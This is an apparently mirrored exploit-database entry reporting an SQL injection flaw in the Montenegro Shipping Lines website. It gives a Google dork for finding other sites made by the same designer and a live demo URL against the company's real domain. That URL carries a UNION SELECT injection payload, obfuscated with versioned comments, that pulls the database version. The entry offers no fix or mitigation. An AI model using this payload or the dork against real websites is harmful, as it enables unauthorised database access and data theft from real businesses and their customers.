Montenegro Shipping Lines, Inc. - SQL Injection Vulnerability

Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030062

Below is a copy:

Montenegro Shipping Lines, Inc. - SQL Injection Vulnerability

*********************************************************
#Exploit Title: Montenegro Shipping Lines, Inc. - SQL Injection Vulnerability
#Date: 2022-03-14
#Exploit Author: Jayson San Buenaventura
#Google Dork: "Designed by Rushtek Enterprise"
#Category: webapps
#Tested On: Parrot Sec, CyberFox
 
 
Proof of Concept:
Search google Dork: "Designed by Rushtek Enterprise"


### Demo :

https://montenegrolines.com.ph/inquery-single.php?news_id=-2'+/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7--+

********************************************************* 
#Discovered by: Jayson San Buenaventura
#Facebook: Jayson Cabrillas San Buenaventura
#Email: [email protected]
*********************************************************

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.